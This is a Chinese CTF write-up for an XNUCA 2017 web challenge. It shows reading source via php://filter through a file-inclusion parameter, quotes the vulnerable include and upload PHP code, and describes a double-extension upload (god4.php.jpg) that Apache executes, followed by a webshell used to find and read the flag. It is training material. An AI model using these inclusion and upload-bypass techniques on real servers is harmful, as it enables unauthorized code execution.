XNUCA 2017-Web专题赛前指导-Document-writeup

php伪协议 文件读取 文件上传绕过 apache解析漏洞

题目

http://218.76.35.74:20129

Solution

查看源代码：

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Document</title>
</head>
<body>
    <!-- include.php -->
</body>
</html>

发现有include.php，访问：

http://218.76.35.74:20129/include.php

提示 the parameter is file! :) 。同时查看源代码有upload.php，是个上传页面。

利用php伪协议读取源码。

http://218.76.35.74:20129/include.php?file=php://filter/read=convert.base64-encode/resource=include

include.php:

<html>
Tips: the parameter is file! :)
<!-- upload.php -->
</html>
<?php
    @$file = $_GET["file"];
    if(isset($file))
    {
        if (preg_match('/http|data|ftp|input|%00/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=70)
        {
            echo "<p> error! </p>";
        }
        else
        {
            include($file.'.php');
        }
    }
?>

读取upload源码：

http://218.76.35.74:20129/include.php?file=php://filter/read=convert.base64-encode/resource=upload

upload.php:

<form action="" enctype="multipart/form-data" method="post"
name="upload">file:<input type="file" name="file" /><br>
<input type="submit" value="upload" /></form>

<?php
if(!empty($_FILES["file"]))
{
    echo $_FILES["file"];
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    @$temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (((@$_FILES["file"]["type"] == "image/gif") || (@$_FILES["file"]["type"] == "image/jpeg")
    || (@$_FILES["file"]["type"] == "image/jpg") || (@$_FILES["file"]["type"] == "image/pjpeg")
    || (@$_FILES["file"]["type"] == "image/x-png") || (@$_FILES["file"]["type"] == "image/png"))
    && (@$_FILES["file"]["size"] < 102400) && in_array($extension, $allowedExts))
    {
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
        echo "file upload successful!Save in:  " . "upload/" . $_FILES["file"]["name"];
    }
    else
    {
        echo "upload failed!";
    }
}
?>

随手上传了一个 god4.php.jpg

访问:

http://218.76.35.74:20129/upload/god4.php.jpg

被解析了，应该是因为apache的缘故，不识别jpg，然后向前递归解析了php。既然能解析，那就用菜刀连上去：

在虚拟终端中：

find / | grep flag

然后发现有：

/etc/.sshkey/flag.txt

得到flag:

[/var/www/html/upload/]$ cat /etc/.sshkey/flag.txt
7F5A58DFC54CFAC9903FE85D92703787

这题也有多种解法，因为在include.php中可以发现，没有对zip或者phar协议等进行过滤，可以利用这些协议进行直接的文件包含。